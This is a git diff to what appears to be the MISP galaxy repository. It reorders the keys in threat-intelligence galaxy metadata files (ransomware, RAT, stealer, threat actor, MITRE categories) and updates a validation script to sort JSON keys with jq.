--git a/galaxies/mitre-mobile-attack-relationship.json b/galaxies/mitre-mobile-attack-relationship.json index a84e654..e99d84d 100644 --- a/galaxies/mitre-mobile-attack-relationship.json +++ b/galaxies/mitre-mobile-attack-relationship.json @@ -1,9 +1,9 @@ { - "name": "Mobile Attack - Relationship", - "type": "mitre-mobile-attack-relationship", "description": "Mitre Relationship", - "uuid": "fc8471aa-1707-11e8-b306-33cbe96a1ede", - "version": 4, "icon": "link", - "namespace": "mitre-attack" + "name": "Mobile Attack - Relationship", + "namespace": "mitre-attack", + "type": "mitre-mobile-attack-relationship", + "uuid": "fc8471aa-1707-11e8-b306-33cbe96a1ede", + "version": 4 } diff --git a/galaxies/mitre-mobile-attack-tool.json b/galaxies/mitre-mobile-attack-tool.json index 572a88b..7f92b58 100644 --- a/galaxies/mitre-mobile-attack-tool.json +++ b/galaxies/mitre-mobile-attack-tool.json @@ -1,9 +1,9 @@ { - "name": "Mobile Attack - Tool", - "type": "mitre-mobile-attack-tool", "description": "Name of ATT&CK software", - "uuid": "1d0b4bce-1708-11e8-9e6e-1b130c9b0a91", - "version": 4, "icon": "gavel", - "namespace": "mitre-attack" + "name": "Mobile Attack - Tool", + "namespace": "mitre-attack", + "type": "mitre-mobile-attack-tool", + "uuid": "1d0b4bce-1708-11e8-9e6e-1b130c9b0a91", + "version": 4 } diff --git a/galaxies/mitre-pre-attack-attack-pattern.json b/galaxies/mitre-pre-attack-attack-pattern.json index 8475a54..ae97d22 100644 --- a/galaxies/mitre-pre-attack-attack-pattern.json +++ b/galaxies/mitre-pre-attack-attack-pattern.json @@ -1,9 +1,9 @@ { - "name": "Pre Attack - Attack Pattern", - "type": "mitre-pre-attack-attack-pattern", "description": "ATT&CK Tactic", - "uuid": "1f665850-1708-11e8-9cfe-4792b2a91402", - "version": 4, "icon": "map", - "namespace": "mitre-attack" + "name": "Pre Attack - Attack Pattern", + "namespace": "mitre-attack", + "type": "mitre-pre-attack-attack-pattern", + "uuid": "1f665850-1708-11e8-9cfe-4792b2a91402", + "version": 4 } diff --git a/galaxies/mitre-pre-attack-intrusion-set.json b/galaxies/mitre-pre-attack-intrusion-set.json index 8115ddd..9570445 100644 --- a/galaxies/mitre-pre-attack-intrusion-set.json +++ b/galaxies/mitre-pre-attack-intrusion-set.json @@ -1,9 +1,9 @@ { - "name": "Pre Attack - Intrusion Set", - "type": "mitre-pre-attack-intrusion-set", "description": "Name of ATT&CK Group", - "uuid": "1fb6d5b4-1708-11e8-9836-8bbc8ce6866e", - "version": 4, "icon": "user-secret", - "namespace": "mitre-attack" + "name": "Pre Attack - Intrusion Set", + "namespace": "mitre-attack", + "type": "mitre-pre-attack-intrusion-set", + "uuid": "1fb6d5b4-1708-11e8-9836-8bbc8ce6866e", + "version": 4 } diff --git a/galaxies/mitre-pre-attack-relationship.json b/galaxies/mitre-pre-attack-relationship.json index 467a72a..1385b72 100644 --- a/galaxies/mitre-pre-attack-relationship.json +++ b/galaxies/mitre-pre-attack-relationship.json @@ -1,9 +1,9 @@ { - "uuid": "1f8e3bae-1708-11e8-8e97-4bd2150e5aae", "description": "Mitre Relationship", - "version": 5, "icon": "link", - "type": "mitre-pre-attack-relationship", "name": "Pre Attack - Relationship", - "namespace": "mitre-attack" + "namespace": "mitre-attack", + "type": "mitre-pre-attack-relationship", + "uuid": "1f8e3bae-1708-11e8-8e97-4bd2150e5aae", + "version": 5 } diff --git a/galaxies/mitre-tool.json b/galaxies/mitre-tool.json index 416ccf8..abd3132 100644 --- a/galaxies/mitre-tool.json +++ b/galaxies/mitre-tool.json @@ -1,9 +1,9 @@ { - "name": "Tool", - "type": "mitre-tool", "description": "Name of ATT&CK software", "icon": "gavel", - "version": 5, + "name": "Tool", + "namespace": "deprecated", + "type": "mitre-tool", "uuid": "d5cbd1a2-78f6-11e7-a833-7b9bccca9649", - "namespace": "deprecated" + "version": 5 } diff --git a/galaxies/preventive-measure.json b/galaxies/preventive-measure.json index ffb280b..7739089 100644 --- a/galaxies/preventive-measure.json +++ b/galaxies/preventive-measure.json @@ -1,9 +1,9 @@ { - "name": "Preventive Measure", - "type": "preventive-measure", "description": "Preventive measures based on the ransomware document overview as published in https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml# . The preventive measures are quite generic and can fit any standard Windows infrastructure and their security measures.", - "version": 3, "icon": "shield", + "name": "Preventive Measure", + "namespace": "misp", + "type": "preventive-measure", "uuid": "8168995b-adcd-4684-9e37-206c5771505a", - "namespace": "misp" + "version": 3 } diff --git a/galaxies/ransomware.json b/galaxies/ransomware.json index 90cdacd..8af5f41 100644 --- a/galaxies/ransomware.json +++ b/galaxies/ransomware.json @@ -1,9 +1,9 @@ { "description": "Ransomware galaxy based on https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml", - "type": "ransomware", - "version": 4, - "name": "Ransomware", "icon": "btc", + "name": "Ransomware", + "namespace": "misp", + "type": "ransomware", "uuid": "3f44af2e-1480-4b6b-9aa8-f9bb21341078", - "namespace": "misp" + "version": 4 } diff --git a/galaxies/rat.json b/galaxies/rat.json index c30e986..a68c737 100644 --- a/galaxies/rat.json +++ b/galaxies/rat.json @@ -1,9 +1,9 @@ { - "type": "rat", - "name": "RAT", "description": "remote administration tool or remote access tool (RAT), also called sometimes remote access trojan, is a piece of software or programming that allows a remote \"operator\" to control a system as if they have physical access to that system.", - "version": 3, "icon": "eye", + "name": "RAT", + "namespace": "misp", + "type": "rat", "uuid": "06825db6-4797-11e7-ac4d-af25fdcdd299", - "namespace": "misp" + "version": 3 } diff --git a/galaxies/sector.json b/galaxies/sector.json index 6d002bd..045d08f 100644 --- a/galaxies/sector.json +++ b/galaxies/sector.json @@ -1,9 +1,9 @@ { - "type": "sector", - "name": "Sector", "description": "Activity sectors", - "version": 2, "icon": "industry", + "name": "Sector", + "namespace": "misp", + "type": "sector", "uuid": "e1bb134c-ae4d-11e7-8aa9-f78a37325439", - "namespace": "misp" + "version": 2 } diff --git a/galaxies/stealer.json b/galaxies/stealer.json index 8ab1c20..3da0cc5 100644 --- a/galaxies/stealer.json +++ b/galaxies/stealer.json @@ -1,9 +1,9 @@ { "description": "Malware stealer galaxy.", - "type": "stealer", - "version": 1, - "name": "Stealer", "icon": "key", + "name": "Stealer", + "namespace": "misp", + "type": "stealer", "uuid": "f2ef4033-9001-4427-a418-df8c48e6d054", - "namespace": "misp" + "version": 1 } diff --git a/galaxies/tds.json b/galaxies/tds.json index 799790c..0ca9913 100644 --- a/galaxies/tds.json +++ b/galaxies/tds.json @@ -1,9 +1,9 @@ { - "type": "tds", - "name": "TDS", "description": "TDS is a list of Traffic Direction System used by adversaries", - "version": 4, "icon": "cart-arrow-down", + "name": "TDS", + "namespace": "misp", + "type": "tds", "uuid": "1b9a7d8e-bd7a-11e6-a4a6-cec0c932ce01", - "namespace": "misp" + "version": 4 } diff --git a/galaxies/threat-actor.json b/galaxies/threat-actor.json index ae65bdb..c968479 100644 --- a/galaxies/threat-actor.json +++ b/galaxies/threat-actor.json @@ -1,9 +1,9 @@ { - "name": "Threat Actor", - "type": "threat-actor", "description": "Threat actors are characteristics of malicious actors (or adversaries) representing a cyber attack threat including presumed intent and historically observed behaviour.", - "version": 3, "icon": "user-secret", + "name": "Threat Actor", + "namespace": "misp", + "type": "threat-actor", "uuid": "698774c7-8022-42c4-917f-8d6e4f06ada3", - "namespace": "misp" + "version": 3 } diff --git a/galaxies/tool.json b/galaxies/tool.json index a5d0aee..41f90ae 100644 --- a/galaxies/tool.json +++ b/galaxies/tool.json @@ -1,9 +1,9 @@ { - "type": "tool", - "name": "Tool", "description": "Threat actors tools is an enumeration of tools used by adversaries. The list includes malware but also common software regularly used by the adversaries.", - "version": 3, "icon": "optin-monster", + "name": "Tool", + "namespace": "misp", + "type": "tool", "uuid": "9b8037f7-bc8f-4de1-a797-37266619bc0b", - "namespace": "misp" + "version": 3 } diff --git a/jq_all_the_things.sh b/jq_all_the_things.sh index 2d9cc62..6fc3099 100755 --- a/jq_all_the_things.sh +++ b/jq_all_the_things.sh @@ -6,6 +6,7 @@ for dir in `find . -name "*.json"` do echo validating ${dir} + # python3 -c "import json; f_in = open('${dir}'); data = json.load(f_in); f_in.close(); f_out = open('${dir}', 'w'); json.dump(data, f_out, indent=2, sort_keys=True, ensure_ascii=False); f_out.close();" cat ${dir} | jq . >/dev/null rc=$? if [[ $rc != 0 ]]; then exit $rc; fi @@ -17,13 +18,13 @@ set -x for dir in clusters/*.json do # Beautify it - cat ${dir} | jq . | sponge ${dir} + cat ${dir} | jq --sort-keys . | sponge ${dir} done for dir in galaxies/*.json do # Beautify it - cat ${dir} | jq . | sponge ${dir} + cat ${dir} | jq --sort-keys . | sponge ${dir} done cat schema_clusters.json | jq . | sponge schema_clusters.json